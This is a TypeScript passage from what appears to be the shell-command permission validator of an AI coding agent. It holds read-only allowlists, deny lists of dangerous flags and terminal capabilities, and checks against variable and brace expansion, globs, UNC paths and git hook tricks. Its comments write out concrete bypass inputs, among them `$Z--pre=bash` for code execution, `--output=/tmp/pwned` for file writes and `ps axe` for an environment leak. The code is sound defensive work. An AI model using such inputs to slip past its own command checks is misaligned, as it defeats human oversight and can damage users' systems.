 970      '-x': 'none',
 971      // SECURITY: -S (read capability names from stdin) deliberately EXCLUDED.
 972      // It must NOT be in safeFlags because validateFlags unbundles combined
 973      // short flags (e.g., -xS → -x + -S), but the callback receives the raw
 974      // token '-xS' and only checks exact match 'token === "-S"'. Excluding -S
 975      // from safeFlags ensures validateFlags rejects it (bundled or not) before
 976      // the callback runs. The callback's -S check is defense-in-depth.
 977    },
 978    additionalCommandIsDangerousCallback: (
 979      _rawCommand: string,
 980      args: string[],
 981    ) => {
 982      // Capabilities that modify terminal state or could be harmful.
 983      // init/reset run iprog (arbitrary code from terminfo) and modify tty settings.
 984      // rs1/rs2/rs3/is1/is2/is3 are the individual reset/init sequences that
 985      // init/reset invoke internally — rs1 sends ESC c (full terminal reset).
 986      // clear erases scrollback (evidence destruction). mc5/mc5p activate media copy
 987      // (redirect output to printer device). smcup/rmcup manipulate screen buffer.
 988      // pfkey/pfloc/pfx/pfxl program function keys — pfloc executes strings locally.
 989      // rf is reset file (analogous to if/init_file).
 990      const DANGEROUS_CAPABILITIES = new Set([
 991        'init',
 992        'reset',
 993        'rs1',
 994        'rs2',
 995        'rs3',
 996        'is1',
 997        'is2',
 998        'is3',
 999        'iprog',
1000        'if',
1001        'rf',
1002        'clear',
1003        'flash',
1004        'mc0',
1005        'mc4',
1006        'mc5',
1007        'mc5i',
1008        'mc5p',
1009        'pfkey',
1010        'pfloc',
1011        'pfx',
1012        'pfxl',
1013        'smcup',
1014        'rmcup',
1015      ])
1016      const flagsWithArgs = new Set(['-T'])
1017      let i = 0
1018      let afterDoubleDash = false
1019      while (i < args.length) {
1020        const token = args[i]!
1021        if (token === '--') {
1022          afterDoubleDash = true
1023          i++
1024        } else if (!afterDoubleDash && token.startsWith('-')) {
1025          // Defense-in-depth: block -S even if it somehow passes validateFlags
1026          if (token === '-S') return true
1027          // Also check for -S bundled with other flags (e.g., -xS)
1028          if (
1029            !token.startsWith('--') &&
1030            token.length > 2 &&
1031            token.includes('S')
1032          )
1033            return true
1034          if (flagsWithArgs.has(token)) {
1035            i += 2
1036          } else {
1037            i++
1038          }
1039        } else {
1040          if (DANGEROUS_CAPABILITIES.has(token)) return true
1041          i++
1042        }
1043      }
1044      return false
1045    },
1046  },
1047
1048  // ss — socket statistics (iproute2). Read-only query tool equivalent to netstat.
1049  // SECURITY: -K/--kill (forcibly close sockets) and -D/--diag (dump raw data to file)
1050  // are deliberately excluded. -F/--filter (read filter from file) also excluded.
1051  ss: {
1052    safeFlags: {
1053      '-h': 'none',
1054      '--help': 'none',
1055      '-V': 'none',
1056      '--version': 'none',
1057      '-n': 'none',
1058      '--numeric': 'none',
1059      '-r': 'none',
1060      '--resolve': 'none',
1061      '-a': 'none',
1062      '--all': 'none',
1063      '-l': 'none',
1064      '--listening': 'none',
1065      '-o': 'none',
1066      '--options': 'none',
1067      '-e': 'none',
1068      '--extended': 'none',
1069      '-m': 'none',
1070      '--memory': 'none',
1071      '-p': 'none',
1072      '--processes': 'none',
1073      '-i': 'none',
1074      '--info': 'none',
1075      '-s': 'none',
1076      '--summary': 'none',
1077      '-4': 'none',
1078      '--ipv4': 'none',
1079      '-6': 'none',
1080      '--ipv6': 'none',
1081      '-0': 'none',
1082      '--packet': 'none',
1083      '-t': 'none',
1084      '--tcp': 'none',
1085      '-M': 'none',
1086      '--mptcp': 'none',
1087      '-S': 'none',
1088      '--sctp': 'none',
1089      '-u': 'none',
1090      '--udp': 'none',
1091      '-d': 'none',
1092      '--dccp': 'none',
1093      '-w': 'none',
1094      '--raw': 'none',
1095      '-x': 'none',
1096      '--unix': 'none',
1097      '--tipc': 'none',
1098      '--vsock': 'none',
1099      '-f': 'string',
1100      '--family': 'string',
1101      '-A': 'string',
1102      '--query': 'string',
1103      '--socket': 'string',
1104      '-Z': 'none',
1105      '--context': 'none',
1106      '-z': 'none',
1107      '--contexts': 'none',
1108      // SECURITY: -N/--net EXCLUDED — performs setns(), unshare(), mount(), umount()
1109      // to switch network namespace. While isolated to forked process, too invasive.
1110      '-b': 'none',
1111      '--bpf': 'none',
1112      '-E': 'none',
1113      '--events': 'none',
1114      '-H': 'none',
1115      '--no-header': 'none',
1116      '-O': 'none',
1117      '--oneline': 'none',
1118      '--tipcinfo': 'none',
1119      '--tos': 'none',
1120      '--cgroup': 'none',
1121      '--inet-sockopt': 'none',
1122      // SECURITY: -K/--kill EXCLUDED — forcibly closes sockets
1123      // SECURITY: -D/--diag EXCLUDED — dumps raw TCP data to a file
1124      // SECURITY: -F/--filter EXCLUDED — reads filter expressions from a file
1125    },
1126  },
1127
1128  // fd/fdfind — fast file finder (fd-find). Read-only search tool.
1129  // SECURITY: -x/--exec (execute command per result) and -X/--exec-batch
1130  // (execute command with all results) are deliberately excluded.
1131  fd: { safeFlags: { ...FD_SAFE_FLAGS } },
1132  // fdfind is the Debian/Ubuntu package name for fd — same binary, same flags
1133  fdfind: { safeFlags: { ...FD_SAFE_FLAGS } },
1134
1135  ...PYRIGHT_READ_ONLY_COMMANDS,
1136  ...DOCKER_READ_ONLY_COMMANDS,
1137}
1138
1139// gh commands are ant-only since they make network requests, which goes against
1140// the read-only validation principle of no network access
1141const ANT_ONLY_COMMAND_ALLOWLIST: Record<string, CommandConfig> = {
1142  // All gh read-only commands from shared validation map
1143  ...GH_READ_ONLY_COMMANDS,
1144  // aki — Anthropic internal knowledge-base search CLI.
1145  // Network read-only (same policy as gh). --audit-csv omitted: writes to disk.
1146  aki: {
1147    safeFlags: {
1148      '-h': 'none',
1149      '--help': 'none',
1150      '-k': 'none',
1151      '--keyword': 'none',
1152      '-s': 'none',
1153      '--semantic': 'none',
1154      '--no-adaptive': 'none',
1155      '-n': 'number',
1156      '--limit': 'number',
1157      '-o': 'number',
1158      '--offset': 'number',
1159      '--source': 'string',
1160      '--exclude-source': 'string',
1161      '-a': 'string',
1162      '--after': 'string',
1163      '-b': 'string',
1164      '--before': 'string',
1165      '--collection': 'string',
1166      '--drive': 'string',
1167      '--folder': 'string',
1168      '--descendants': 'none',
1169      '-m': 'string',
1170      '--meta': 'string',
1171      '-t': 'string',
1172      '--threshold': 'string',
1173      '--kw-weight': 'string',
1174      '--sem-weight': 'string',
1175      '-j': 'none',
1176      '--json': 'none',
1177      '-c': 'none',
1178      '--chunk': 'none',
1179      '--preview': 'none',
1180      '-d': 'none',
1181      '--full-doc': 'none',
1182      '-v': 'none',
1183      '--verbose': 'none',
1184      '--stats': 'none',
1185      '-S': 'number',
1186      '--summarize': 'number',
1187      '--explain': 'none',
1188      '--examine': 'string',
1189      '--url': 'string',
1190      '--multi-turn': 'number',
1191      '--multi-turn-model': 'string',
1192      '--multi-turn-context': 'string',
1193      '--no-rerank': 'none',
1194      '--audit': 'none',
1195      '--local': 'none',
1196      '--staging': 'none',
1197    },
1198  },
1199}
1200
1201function getCommandAllowlist(): Record<string, CommandConfig> {
1202  let allowlist: Record<string, CommandConfig> = COMMAND_ALLOWLIST
1203  // On Windows, xargs can be used as a data-to-code bridge: if a file contains
1204  // a UNC path, `cat file | xargs cat` feeds that path to cat, triggering SMB
1205  // resolution. Since the UNC path is in file contents (not the command string),
1206  // regex-based detection cannot catch this.
1207  if (getPlatform() === 'windows') {
1208    const { xargs: _, ...rest } = allowlist
1209    allowlist = rest
1210  }
1211  if (process.env.USER_TYPE === 'ant') {
1212    return { ...allowlist, ...ANT_ONLY_COMMAND_ALLOWLIST }
1213  }
1214  return allowlist
1215}
1216
1217/**
1218 * Commands that are safe to use as xargs targets for auto-approval.
1219 *
1220 * SECURITY: Only add a command to this list if it has NO flags that can:
1221 * 1. Write to files (e.g., find's -fprint, sed's -i)
1222 * 2. Execute code (e.g., find's -exec, awk's system(), perl's -e)
1223 * 3. Make network requests
1224 *
1225 * These commands must be purely read-only utilities. When xargs uses one of
1226 * these as a target, we stop validating flags after the target command
1227 * (see the `break` in isCommandSafeViaFlagParsing), so the command itself
1228 * must not have ANY dangerous flags, not just a safe subset.
1229 *
1230 * Each command was verified by checking its man page for dangerous capabilities.
1231 */
1232const SAFE_TARGET_COMMANDS_FOR_XARGS = [
1233  'echo', // Output only, no dangerous flags
1234  'printf', // xargs runs /usr/bin/printf (binary), not bash builtin — no -v support
1235  'wc', // Read-only counting, no dangerous flags
1236  'grep', // Read-only search, no dangerous flags
1237  'head', // Read-only, no dangerous flags
1238  'tail', // Read-only (including -f follow), no dangerous flags
1239]
1240
1241/**
1242 * Unified command validation function that replaces individual validator functions.
1243 * Uses declarative configuration from COMMAND_ALLOWLIST to validate commands and their flags.
1244 * Handles combined flags, argument validation, and shell quoting bypass detection.
1245 */
1246export function isCommandSafeViaFlagParsing(command: string): boolean {
1247  // Parse the command to get individual tokens using shell-quote for accuracy
1248  // Handle glob operators by converting them to strings, they don't matter from the perspective
1249  // of this function
1250  const parseResult = tryParseShellCommand(command, env => `$${env}`)
1251  if (!parseResult.success) return false
1252
1253  const parsed = parseResult.tokens.map(token => {
1254    if (typeof token !== 'string') {
1255      token = token as { op: 'glob'; pattern: string }
1256      if (token.op === 'glob') {
1257        return token.pattern
1258      }
1259    }
1260    return token
1261  })
1262
1263  // If there are operators (pipes, redirects, etc.), it's not a simple command.
1264  // Breaking commands down into their constituent parts is handled upstream of
1265  // this function, so we reject anything with operators here.
1266  const hasOperators = parsed.some(token => typeof token !== 'string')
1267  if (hasOperators) {
1268    return false
1269  }
1270
1271  // Now we know all tokens are strings
1272  const tokens = parsed as string[]
1273
1274  if (tokens.length === 0) {
1275    return false
1276  }
1277
1278  // Find matching command configuration
1279  let commandConfig: CommandConfig | undefined
1280  let commandTokens: number = 0
1281
1282  // Check for multi-word commands first (e.g., "git diff", "git stash list")
1283  const allowlist = getCommandAllowlist()
1284  for (const [cmdPattern] of Object.entries(allowlist)) {
1285    const cmdTokens = cmdPattern.split(' ')
1286    if (tokens.length >= cmdTokens.length) {
1287      let matches = true
1288      for (let i = 0; i < cmdTokens.length; i++) {
1289        if (tokens[i] !== cmdTokens[i]) {
1290          matches = false
1291          break
1292        }
1293      }
1294      if (matches) {
1295        commandConfig = allowlist[cmdPattern]
1296        commandTokens = cmdTokens.length
1297        break
1298      }
1299    }
1300  }
1301
1302  if (!commandConfig) {
1303    return false // Command not in allowlist
1304  }
1305
1306  // Special handling for git ls-remote to reject URLs that could lead to data exfiltration
1307  if (tokens[0] === 'git' && tokens[1] === 'ls-remote') {
1308    // Check if any argument looks like a URL or remote specification
1309    for (let i = 2; i < tokens.length; i++) {
1310      const token = tokens[i]
1311      if (token && !token.startsWith('-')) {
1312        // Reject HTTP/HTTPS URLs
1313        if (token.includes('://')) {
1314          return false
1315        }
1316        // Reject SSH URLs like git@github.com:user/repo.git
1317        if (token.includes('@') || token.includes(':')) {
1318          return false
1319        }
1320        // Reject variable references
1321        if (token.includes('$')) {
1322          return false
1323        }
1324      }
1325    }
1326  }
1327
1328  // SECURITY: Reject ANY token containing `$` (variable expansion). The
1329  // `env => \`$${env}\`` callback at line 825 preserves `$VAR` as LITERAL TEXT
1330  // in tokens, but bash expands it at runtime (unset vars → empty string).
1331  // This parser differential defeats BOTH validateFlags and callbacks:
1332  //
1333  //   (1) `$VAR`-prefix defeats validateFlags `startsWith('-')` check:
1334  //       `git diff "$Z--output=/tmp/pwned"` → token `$Z--output=/tmp/pwned`
1335  //       (starts with `$`) falls through as positional at ~:1730. Bash runs
1336  //       `git diff --output=/tmp/pwned`. ARBITRARY FILE WRITE, zero perms.
1337  //
1338  //   (2) `$VAR`-prefix → RCE via `rg --pre`:
1339  //       `rg . "$Z--pre=bash" FILE` → executes `bash FILE`. rg's config has
1340  //       no regex and no callback. SINGLE-STEP ARBITRARY CODE EXECUTION.
1341  //
1342  //   (3) `$VAR`-infix defeats additionalCommandIsDangerousCallback regex:
1343  //       `ps ax"$Z"e` → token `ax$Ze`. The ps callback regex
1344  //       `/^[a-zA-Z]*e[a-zA-Z]*$/` fails on `$` → "not dangerous". Bash runs
1345  //       `ps axe` → env vars for all processes. A fix limited to `$`-PREFIXED
1346  //       tokens would NOT close this.
1347  //
1348  // We check ALL tokens after the command prefix. Any `$` means we cannot
1349  // determine the runtime token value, so we cannot verify read-only safety.
1350  // This check must run BEFORE validateFlags and BEFORE callbacks.
1351  for (let i = commandTokens; i < tokens.length; i++) {
1352    const token = tokens[i]
1353    if (!token) continue
1354    // Reject any token containing $ (variable expansion)
1355    if (token.includes('$')) {
1356      return false
1357    }
1358    // Reject tokens with BOTH `{` and `,` (brace expansion obfuscation).
1359    // `git diff {@'{'0},--output=/tmp/pwned}` → shell-quote strips quotes
1360    // → token `{@{0},--output=/tmp/pwned}` has `{` + `,` → brace expansion.
1361    // This is defense-in-depth with validateBraceExpansion in bashSecurity.ts.
1362    // We require BOTH `{` and `,` to avoid false positives on legitimate
1363    // patterns: `stash@{0}` (git ref, has `{` no `,`), `{{.State}}` (Go
1364    // template, no `,`), `prefix-{}-suffix` (xargs, no `,`). Sequence form
1365    // `{1..5}` also needs checking (has `{` + `..`).
1366    if (token.includes('{') && (token.includes(',') || token.includes('..'))) {
1367      return false
1368    }
1369  }
1370
1371  // Validate flags starting after the command tokens
1372  if (
1373    !validateFlags(tokens, commandTokens, commandConfig, {
1374      commandName: tokens[0],
1375      rawCommand: command,
1376      xargsTargetCommands:
1377        tokens[0] === 'xargs' ? SAFE_TARGET_COMMANDS_FOR_XARGS : undefined,
1378    })
1379  ) {
1380    return false
1381  }
1382
1383  if (commandConfig.regex && !commandConfig.regex.test(command)) {
1384    return false
1385  }
1386  if (!commandConfig.regex && /`/.test(command)) {
1387    return false
1388  }
1389  // Block newlines and carriage returns in grep/rg patterns as they can be used for injection
1390  if (
1391    !commandConfig.regex &&
1392    (tokens[0] === 'rg' || tokens[0] === 'grep') &&
1393    /[\n\r]/.test(command)
1394  ) {
1395    return false
1396  }
1397  if (
1398    commandConfig.additionalCommandIsDangerousCallback &&
1399    commandConfig.additionalCommandIsDangerousCallback(
1400      command,
1401      tokens.slice(commandTokens),
1402    )
1403  ) {
1404    return false
1405  }
1406
1407  return true
1408}
1409
1410/**
1411 * Creates a regex pattern that matches safe invocations of a command.
1412 *
1413 * The regex ensures commands are invoked safely by blocking:
1414 * - Shell metacharacters that could lead to command injection or redirection
1415 * - Command substitution via backticks or $()
1416 * - Variable expansion that could contain malicious payloads
1417 * - Environment variable assignment bypasses (command=value)
1418 *
1419 * @param command The command name (e.g., 'date', 'npm list', 'ip addr')
1420 * @returns RegExp that matches safe invocations of the command
1421 */
1422function makeRegexForSafeCommand(command: string): RegExp {
1423  // Create regex pattern: /^command(?:\s|$)[^<>()$`|{}&;\n\r]*$/
1424  return new RegExp(`^${command}(?:\\s|$)[^<>()$\`|{}&;\\n\\r]*$`)
1425}
1426
1427// Simple commands that are safe for execution (converted to regex patterns using makeRegexForSafeCommand)
1428// WARNING: If you are adding new commands here, be very careful to ensure
1429// they are truly safe. This includes ensuring:
1430// 1. That they don't have any flags that allow file writing or command execution
1431// 2. Use makeRegexForSafeCommand() to ensure proper regex pattern creation
1432const READONLY_COMMANDS = [
1433  // Cross-platform commands from shared validation
1434  ...EXTERNAL_READONLY_COMMANDS,
1435
1436  // Unix/bash-specific read-only commands (not shared because they don't exist in PowerShell)
1437
1438  // Time and date
1439  'cal',
1440  'uptime',
1441
1442  // File content viewing (relative paths handled separately)
1443  'cat',
1444  'head',
1445  'tail',
1446  'wc',
1447  'stat',
1448  'strings',
1449  'hexdump',
1450  'od',
1451  'nl',
1452
1453  // System info
1454  'id',
1455  'uname',
1456  'free',
1457  'df',
1458  'du',
1459  'locale',
1460  'groups',
1461  'nproc',
1462
1463  // Path information
1464  'basename',
1465  'dirname',
1466  'realpath',
1467
1468  // Text processing
1469  'cut',
1470  'paste',
1471  'tr',
1472  'column',
1473  'tac', // Reverse cat — displays file contents in reverse line order
1474  'rev', // Reverse characters in each line
1475  'fold', // Wrap lines to specified width
1476  'expand', // Convert tabs to spaces
1477  'unexpand', // Convert spaces to tabs
1478  'fmt', // Simple text formatter — output to stdout only
1479  'comm', // Compare sorted files line by line
1480  'cmp', // Byte-by-byte file comparison
1481  'numfmt', // Number format conversion
1482
1483  // Path information (additional)
1484  'readlink', // Resolve symlinks — displays target of symbolic link
1485
1486  // File comparison
1487  'diff',
1488
1489  // true and false, used to silence or create errors
1490  'true',
1491  'false',
1492
1493  // Misc. safe commands
1494  'sleep',
1495  'which',
1496  'type',
1497  'expr', // Evaluate expressions (arithmetic, string matching)
1498  'test', // Conditional evaluation (file checks, comparisons)
1499  'getconf', // Get system configuration values
1500  'seq', // Generate number sequences
1501  'tsort', // Topological sort
1502  'pr', // Paginate files for printing
1503]
1504
1505// Complex commands that require custom regex patterns
1506// Warning: If possible, avoid adding new regexes here and prefer using COMMAND_ALLOWLIST
1507// instead. This allowlist-based approach to CLI flags is more secure and avoids
1508// vulns coming from gnu getopt_long.
1509const READONLY_COMMAND_REGEXES = new Set([
1510  // Convert simple commands to regex patterns using makeRegexForSafeCommand
1511  ...READONLY_COMMANDS.map(makeRegexForSafeCommand),
1512
1513  // Echo that doesn't execute commands or use variables
1514  // Allow newlines in single quotes (safe) but not in double quotes (could be dangerous with variable expansion)
1515  // Also allow optional 2>&1 stderr redirection at the end
1516  /^echo(?:\s+(?:'[^']*'|"[^"$<>\n\r]*"|[^|;&`$(){}><#\\!"'\s]+))*(?:\s+2>&1)?\s*$/,
1517
1518  // Claude CLI help
1519  /^claude -h$/,
1520  /^claude --help$/,
1521
1522  // Git readonly commands are now handled via COMMAND_ALLOWLIST with explicit flag validation
1523  // (git status, git blame, git ls-files, git config --get, git remote, git tag, git branch)
1524
1525  /^uniq(?:\s+(?:-[a-zA-Z]+|--[a-zA-Z-]+(?:=\S+)?|-[fsw]\s+\d+))*(?:\s|$)\s*$/, // Only allow flags, no input/output files
1526
1527  // System info
1528  /^pwd$/,
1529  /^whoami$/,
1530  // env and printenv removed - could expose sensitive environment variables
1531
1532  // Development tools version checking - exact match only, no suffix allowed.
1533  // SECURITY: `node -v --run <task>` would execute package.json scripts because
1534  // Node processes --run before -v. Python/python3 --version are also anchored
1535  // for defense-in-depth. These were previously in EXTERNAL_READONLY_COMMANDS which
1536  // flows through makeRegexForSafeCommand and permits arbitrary suffixes.
1537  /^node -v$/,
1538  /^node --version$/,
1539  /^python --version$/,
1540  /^python3 --version$/,
1541
1542  // Misc. safe commands
1543  // tree command moved to COMMAND_ALLOWLIST for proper flag validation (blocks -o/--output)
1544  /^history(?:\s+\d+)?\s*$/, // Only allow bare history or history with numeric argument - prevents file writing
1545  /^alias$/,
1546  /^arch(?:\s+(?:--help|-h))?\s*$/, // Only allow arch with help flags or no arguments
1547
1548  // Network commands - only allow exact commands with no arguments to prevent network manipulation
1549  /^ip addr$/, // Only allow "ip addr" with no additional arguments
1550  /^ifconfig(?:\s+[a-zA-Z][a-zA-Z0-9_-]*)?\s*$/, // Allow ifconfig with interface name only (must start with letter)
1551
1552  // JSON processing with jq - allow with inline filters and file arguments
1553  // File arguments are validated separately by pathValidation.ts
1554  // Allow pipes and complex expressions within quotes but prevent dangerous flags
1555  // Block command substitution - backticks are dangerous even in single quotes for jq
1556  // Block -f/--from-file, --rawfile, --slurpfile (read files into jq), --run-tests, -L/--library-path (load executable modules)
1557  // Block 'env' builtin and '$ENV' object which can access environment variables (defense in depth)
1558  /^jq(?!\s+.*(?:-f\b|--from-file|--rawfile|--slurpfile|--run-tests|-L\b|--library-path|\benv\b|\$ENV\b))(?:\s+(?:-[a-zA-Z]+|--[a-zA-Z-]+(?:=\S+)?))*(?:\s+'[^'`]*'|\s+"[^"`]*"|\s+[^-\s'"][^\s]*)+\s*$/,
1559
1560  // Path commands (path validation ensures they're allowed)
1561  // cd command - allows changing to directories
1562  /^cd(?:\s+(?:'[^']*'|"[^"]*"|[^\s;|&`$(){}><#\\]+))?$/,
1563  // ls command - allows listing directories
1564  /^ls(?:\s+[^<>()$`|{}&;\n\r]*)?$/,
1565  // find command - blocks dangerous flags
1566  // Allow escaped parentheses \( and \) for grouping, but block unescaped ones
1567  // NOTE: \\[()] must come BEFORE the character class to ensure \( is matched as an escaped paren,
1568  // not as backslash + paren (which would fail since paren is excluded from the character class)
1569  /^find(?:\s+(?:\\[()]|(?!-delete\b|-exec\b|-execdir\b|-ok\b|-okdir\b|-fprint0?\b|-fls\b|-fprintf\b)[^<>()$`|{}&;\n\r\s]|\s)+)?$/,
1570])
1571
1572/**
1573 * Checks if a command contains glob characters (?, *, [, ]) or expandable `$`
1574 * variables OUTSIDE the quote contexts where bash would treat them as literal.
1575 * These could expand to bypass our regex-based security checks.
1576 *
1577 * Glob examples:
1578 * - `python *` could expand to `python --help` if a file named `--help` exists
1579 * - `find ./ -?xec` could expand to `find ./ -exec` if such a file exists
1580 * Globs are literal inside BOTH single and double quotes.
1581 *
1582 * Variable expansion examples:
1583 * - `uniq --skip-chars=0$_` → `$_` expands to last arg of previous command;
1584 *   with IFS word splitting, this smuggles positional args past "flags-only"
1585 *   regexes. `echo " /etc/passwd /tmp/x"; uniq --skip-chars=0$_` → FILE WRITE.
1586 * - `cd "$HOME"` → double-quoted `$HOME` expands at runtime.
1587 * Variables are literal ONLY inside single quotes; they expand inside double
1588 * quotes and unquoted.
1589 *
1590 * The `$` check guards the READONLY_COMMAND_REGEXES fallback path. The `$`
1591 * token check in isCommandSafeViaFlagParsing only covers COMMAND_ALLOWLIST
1592 * commands; hand-written regexes like uniq's `\S+` and cd's `"[^"]*"` allow `$`.
1593 * Matches `$` followed by `[A-Za-z_@*#?!$0-9-]` covering `$VAR`, `$_`, `$@`,
1594 * `$*`, `$#`, `$?`, `$!`, `$$`, `$-`, `$0`-`$9`. Does NOT match `${` or `$(` —
1595 * those are caught by COMMAND_SUBSTITUTION_PATTERNS in bashSecurity.ts.
1596 *
1597 * @param command The command string to check
1598 * @returns true if the command contains unquoted glob or expandable `$`
1599 */
1600function containsUnquotedExpansion(command: string): boolean {
1601  // Track quote state to avoid false positives for patterns inside quoted strings
1602  let inSingleQuote = false
1603  let inDoubleQuote = false
1604  let escaped = false
1605
1606  for (let i = 0; i < command.length; i++) {
1607    const currentChar = command[i]
1608
1609    // Handle escape sequences
1610    if (escaped) {
1611      escaped = false
1612      continue
1613    }
1614
1615    // SECURITY: Only treat backslash as escape OUTSIDE single quotes. In bash,
1616    // `\` inside `'...'` is LITERAL — it does not escape the next character.
1617    // Without this guard, `'\'` desyncs the quote tracker: the `\` sets
1618    // escaped=true, then the closing `'` is consumed by the escaped-skip
1619    // instead of toggling inSingleQuote. Parser stays in single-quote
1620    // mode for the rest of the command, missing ALL subsequent expansions.
1621    // Example: `ls '\' *` — bash sees glob `*`, but desynced parser thinks
1622    // `*` is inside quotes → returns false (glob NOT detected).
1623    // Defense-in-depth: hasShellQuoteSingleQuoteBug catches `'\'` patterns
1624    // before this function is reached, but we fix the tracker anyway for
1625    // consistency with the correct implementations in bashSecurity.ts.
1626    if (currentChar === '\\' && !inSingleQuote) {
1627      escaped = true
1628      continue
1629    }
1630
1631    // Update quote state
1632    if (currentChar === "'" && !inDoubleQuote) {
1633      inSingleQuote = !inSingleQuote
1634      continue
1635    }
1636
1637    if (currentChar === '"' && !inSingleQuote) {
1638      inDoubleQuote = !inDoubleQuote
1639      continue
1640    }
1641
1642    // Inside single quotes: everything is literal. Skip.
1643    if (inSingleQuote) {
1644      continue
1645    }
1646
1647    // Check `$` followed by variable-name or special-parameter character.
1648    // `$` expands inside double quotes AND unquoted (only SQ makes it literal).
1649    if (currentChar === '$') {
1650      const next = command[i + 1]
1651      if (next && /[A-Za-z_@*#?!$0-9-]/.test(next)) {
1652        return true
1653      }
1654    }
1655
1656    // Globs are literal inside double quotes too. Only check unquoted.
1657    if (inDoubleQuote) {
1658      continue
1659    }
1660
1661    // Check for glob characters outside all quotes.
1662    // These could expand to anything, including dangerous flags.
1663    if (currentChar && /[?*[\]]/.test(currentChar)) {
1664      return true
1665    }
1666  }
1667
1668  return false
1669}
1670
1671/**
1672 * Checks if a single command string is read-only based on READONLY_COMMAND_REGEXES.
1673 * Internal helper function that validates individual commands.
1674 *
1675 * @param command The command string to check
1676 * @returns true if the command is read-only
1677 */
1678function isCommandReadOnly(command: string): boolean {
1679  // Handle common stderr-to-stdout redirection pattern
1680  // This handles both "command 2>&1" at the end of a full command
1681  // and "command 2>&1" as part of a pipeline component
1682  let testCommand = command.trim()
1683  if (testCommand.endsWith(' 2>&1')) {
1684    // Remove the stderr redirection for pattern matching
1685    testCommand = testCommand.slice(0, -5).trim()
1686  }
1687
1688  // Check for Windows UNC paths that could be vulnerable to WebDAV attacks
1689  // Do this early to prevent any command with UNC paths from being marked as read-only
1690  if (containsVulnerableUncPath(testCommand)) {
1691    return false
1692  }
1693
1694  // Check for unquoted glob characters and expandable `$` variables that could
1695  // bypass our regex-based security checks. We can't know what these expand to
1696  // at runtime, so we can't verify the command is read-only.
1697  //
1698  // Globs: `python *` could expand to `python --help` if such a file exists.
1699  //
1700  // Variables: `uniq --skip-chars=0$_` — bash expands `$_` at runtime to the
1701  // last arg of the previous command. With IFS word splitting, this smuggles
1702  // positional args past "flags-only" regexes like uniq's `\S+`. The `$` token
1703  // check inside isCommandSafeViaFlagParsing only covers COMMAND_ALLOWLIST
1704  // commands; hand-written regexes in READONLY_COMMAND_REGEXES (uniq, jq, cd)
1705  // have no such guard. See containsUnquotedExpansion for full analysis.
1706  if (containsUnquotedExpansion(testCommand)) {
1707    return false
1708  }
1709
1710  // Tools like git allow `--upload-pack=cmd` to be abbreviated as `--up=cmd`
1711  // Regex filters can be bypassed, so we use strict allowlist validation instead.
1712  // This requires defining a set of known safe flags. Claude can help with this,
1713  // but please look over it to ensure it didn't add any flags that allow file writes
1714  // code execution, or network requests.
1715  if (isCommandSafeViaFlagParsing(testCommand)) {
1716    return true
1717  }
1718
1719  for (const regex of READONLY_COMMAND_REGEXES) {
1720    if (regex.test(testCommand)) {
1721      // Prevent git commands with -c flag to avoid config options that can lead to code execution
1722      // The -c flag allows setting arbitrary git config values inline, including dangerous ones like
1723      // core.fsmonitor, diff.external, core.gitProxy, etc. that can execute arbitrary commands
1724      // Check for -c preceded by whitespace and followed by whitespace or equals
1725      // Using regex to catch spaces, tabs, and other whitespace (not part of other flags like --cached)
1726      if (testCommand.includes('git') && /\s-c[\s=]/.test(testCommand)) {
1727        return false
1728      }
1729
1730      // Prevent git commands with --exec-path flag to avoid path manipulation that can lead to code execution
1731      // The --exec-path flag allows overriding the directory where git looks for executables
1732      if (
1733        testCommand.includes('git') &&
1734        /\s--exec-path[\s=]/.test(testCommand)
1735      ) {
1736        return false
1737      }
1738
1739      // Prevent git commands with --config-env flag to avoid config injection via environment variables
1740      // The --config-env flag allows setting git config values from environment variables, which can be
1741      // just as dangerous as -c flag (e.g., core.fsmonitor, diff.external, core.gitProxy)
1742      if (
1743        testCommand.includes('git') &&
1744        /\s--config-env[\s=]/.test(testCommand)
1745      ) {
1746        return false
1747      }
1748      return true
1749    }
1750  }
1751  return false
1752}
1753
1754/**
1755 * Checks if a compound command contains any git command.
1756 *
1757 * @param command The full command string to check
1758 * @returns true if any subcommand is a git command
1759 */
1760function commandHasAnyGit(command: string): boolean {
1761  return splitCommand_DEPRECATED(command).some(subcmd =>
1762    isNormalizedGitCommand(subcmd.trim()),
1763  )
1764}
1765
1766/**
1767 * Git-internal path patterns that can be exploited for sandbox escape.
1768 * If a command creates these files and then runs git, the git command
1769 * could execute malicious hooks from the created files.
1770 */
1771const GIT_INTERNAL_PATTERNS = [
1772  /^HEAD$/,
1773  /^objects(?:\/|$)/,
1774  /^refs(?:\/|$)/,
1775  /^hooks(?:\/|$)/,
1776]
1777
1778/**
1779 * Checks if a path is a git-internal path (HEAD, objects/, refs/, hooks/).
1780 */
1781function isGitInternalPath(path: string): boolean {
1782  // Normalize path by removing leading ./ or /
1783  const normalized = path.replace(/^\.?\//, '')
1784  return GIT_INTERNAL_PATTERNS.some(pattern => pattern.test(normalized))
1785}
1786
1787// Commands that only delete or modify in-place (don't create new files at new paths)
1788const NON_CREATING_WRITE_COMMANDS = new Set(['rm', 'rmdir', 'sed'])
1789
1790/**
1791 * Extracts write paths from a subcommand using PATH_EXTRACTORS.
1792 * Only returns paths for commands that can create new files/directories
1793 * (write/create operations excluding deletion and in-place modification).
1794 */
1795function extractWritePathsFromSubcommand(subcommand: string): string[] {
1796  const parseResult = tryParseShellCommand(subcommand, env => `$${env}`)
1797  if (!parseResult.success) return []
1798
1799  const tokens = parseResult.tokens.filter(
1800    (t): t is string => typeof t === 'string',
1801  )
1802  if (tokens.length === 0) return []
1803
1804  const baseCmd = tokens[0]
1805  if (!baseCmd) return []
1806
1807  // Only consider commands that can create files at target paths
1808  if (!(baseCmd in COMMAND_OPERATION_TYPE)) {
1809    return []
1810  }
1811  const opType = COMMAND_OPERATION_TYPE[baseCmd as PathCommand]
1812  if (
1813    (opType !== 'write' && opType !== 'create') ||
1814    NON_CREATING_WRITE_COMMANDS.has(baseCmd)
1815  ) {
1816    return []
1817  }
1818
1819  const extractor = PATH_EXTRACTORS[baseCmd as PathCommand]
1820  if (!extractor) return []
1821
1822  return extractor(tokens.slice(1))
1823}
1824
1825/**
1826 * Checks if a compound command writes to any git-internal paths.
1827 * This is used to detect potential sandbox escape attacks where a command
1828 * creates git-internal files (HEAD, objects/, refs/, hooks/) and then runs git.
1829 *
1830 * SECURITY: A compound command could bypass the bare repo detection by:
1831 * 1. Creating bare git repo files (HEAD, objects/, refs/, hooks/) in the same command
1832 * 2. Then running git, which would execute malicious hooks
1833 *
1834 * Example attack:
